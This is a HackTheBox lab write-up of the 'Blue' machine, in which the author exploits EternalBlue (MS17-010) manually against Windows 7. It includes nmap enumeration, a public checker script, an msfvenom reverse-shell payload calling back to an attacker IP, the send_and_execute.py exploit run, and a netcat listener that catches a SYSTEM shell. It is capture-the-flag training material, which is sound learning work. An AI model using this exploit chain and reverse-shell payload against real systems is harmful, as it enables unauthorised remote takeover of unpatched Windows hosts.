imported>Aghanim at 20:46, 17 January 2022

2022-01-17T20:46:16Z

New page

{{Infobox WriteUp
| name = Blue
| platform = HackTheBox
| os = Windows
| difficulty = Easy
| techniques = EternalBlue, MS17-010
}}

[[File:2022-01-image-105.png|thumb]]

This Windows 7 box was vulnerable to Eternalblue or MS17-010. Using metasploit, it would be done in about 10 minutes. But since Im not using metasploit I did it manually. I had a lot of trouble getting the exploit to work because I required named pipes. There is a module in Metasploit which would enumerate it for you, but I didnt use it. However, I used [https://github.com/helviojunior/MS17-010 helviojunior]'s script send_and_execute.py, which is a modified version of [https://github.com/worawit/MS17-010 worawit's] zzz_exploit.py.

----

== Enumeration ==

As always I'll start with an NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.40 -oN nmpa.result 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-07 16:40 EST
Warning: 10.10.10.40 giving up on port because retransmission cap hit (10).
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 16:43 (0:01:26 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.039s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
308/tcp filtered novastorbakcup
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3432/tcp filtered osdcp
3932/tcp filtered dyn-site
4090/tcp filtered omasgport
6847/tcp filtered unknown
8986/tcp filtered unknown
13231/tcp filtered unknown
14275/tcp filtered unknown
23124/tcp filtered unknown
23259/tcp filtered unknown
35388/tcp filtered unknown
41346/tcp filtered unknown
41964/tcp filtered unknown
44930/tcp filtered unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
54785/tcp filtered unknown
55262/tcp filtered unknown
56807/tcp filtered unknown
61099/tcp filtered unknown
63728/tcp filtered unknown
64473/tcp filtered unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-07T21:43:51
|_ start_date: 2022-01-07T21:39:56
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-07T21:43:49+00:00
|_clock-skew: mean: 1m53s, deviation: 0s, median: 1m52s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.10 seconds
</syntaxhighlight>

The OS is '''Windows 7 Professional 7601 Service Pack 1. '''

There are many ports open, but since the machine name is Blue, I got a hint that this might be '''eternalblue''' vulnerability.

>
'''EternalBlue'''[https://en.wikipedia.org/wiki/EternalBlue#cite_note-ars-5 [5]] is a [https://en.wikipedia.org/wiki/Cyberweapon cyberattack] [https://en.wikipedia.org/wiki/Exploit_(computer_security) exploit] developed by the U.S. [https://en.wikipedia.org/wiki/National_Security_Agency National Security Agency] (NSA).[https://en.wikipedia.org/wiki/EternalBlue#cite_note-6 [6]] It was leaked by the [https://en.wikipedia.org/wiki/The_Shadow_Brokers Shadow Brokers] hacker group on April 14, 2017, one month after Microsoft released patches for the [https://en.wikipedia.org/wiki/Vulnerability_(computing) vulnerability]. [...]

EternalBlue exploits a vulnerability in [https://en.wikipedia.org/wiki/Microsoft Microsoft]'s implementation of the [https://en.wikipedia.org/wiki/Server_Message_Block Server Message Block] (SMB) protocol.
https://en.wikipedia.org/wiki/EternalBlue

To verify that the machine is actually vulnerable to eternalblue, I did some enumeration.

=== Eternalblue enum ===

<syntaxhighlight lang="bash">
└─# nmap --script vuln 10.10.10.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 14:19 EST

[...]
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 137.69 seconds

</syntaxhighlight>

And using '''checker.py '''in helviojuniors github to check if target is vulnerable. If it returns anything else other than '''0xC0000205 '''(Which means '''STATUS_INSUFF_SERVER_RESOURCES''') it will say that '''The target is patched. '''

[[File:2022-01-image-106.png|thumb]]

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/…/Desktop/HTB/blue/MS17-010]
└─# python2 checker.py 10.10.10.40 1 ⨯
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

</syntaxhighlight>

Notice how '''Testing named pipes''' returns '''STATUS_ACCESS_DENIED. '''Thats because we havent used a username to authenticate. If I input anything into '''USERNAME''', it will authenticate.

[[File:2022-01-Pasted-image-20220117200723.png|thumb]]

And if I run the script now.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/…/Desktop/HTB/blue/MS17-010]
└─# python2 checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

</syntaxhighlight>

Alrite, now we have established that the target is vulnerable. Now its time to exploit the vulnerability.

== Initial Access ==

Let's first take a look at the script '''send_and_execute.py. '''What happens here is that it takes '''lfile''', which is <code>sys.argv[2]</code>. Example (<code>python2 send_and_execute.py 10.10.10.40 exploit.exe</code>). exploit.exe would be the lfile that is going to be executed on the target machine.

[[File:2022-01-image-108.png|thumb]]

It will execute it as a service using '''service_exec. '''

So first, lets add a USERNAME in the script. As we did with the checker.py script, I'll just add '''useruser''' as USERNAME variable.

Then I'll create a payload using msfvenom.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.17 LPORT=4444 > exploit.exe
</syntaxhighlight>

Start a rlwrap netcat listener and execute the script.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# python2 send_and_execute.py 10.10.10.40 exploit.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80045836c0
SESSION: 0xfffff8a001608660
FLINK: 0xfffff8a00866b088
InParam: 0xfffff8a00862d15c
MID: 0x2103
unexpected alignment, diff: 0x3d088
leak failed... try again
CONNECTION: 0xfffffa80045836c0
SESSION: 0xfffff8a001608660
FLINK: 0xfffff8a008677088
InParam: 0xfffff8a00867115c
MID: 0x2203
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 0P0GY6.exe...
Opening SVCManager on 10.10.10.40.....
Creating service dVJG.....
Starting service dVJG.....
The NETBIOS connection with the remote host timed out.
Removing service dVJG.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

whoami
whoami
nt authority\system

C:\Windows\system32>

</syntaxhighlight>

And just like that, we are '''NT AUTHORITY\SYSTEM. '''As you read from the output for send_and_execute.py, it opens SVCManager, creates a service, and start the service. If the service exist, it will remote it.

[[File:2022-01-image-109.png|thumb]]

== What I've learned ==

* Scripts will usually not work right out of the box. I have to understand how the exploit and the scripts works, and sometimes modify it for it to work. * Even though the same vulnerability exist in XP and other OS, the way its exploited is different from each other. For example, in on the box '''Legacy '''the account used SMB was <blank>, meaning we didnt have to specify a username.

[[Category:HackTheBox]]
[[Category:Windows]]
[[Category:Write-ups]]

Write-ups/HTB/Blue - Revision history

imported>Aghanim at 20:46, 17 January 2022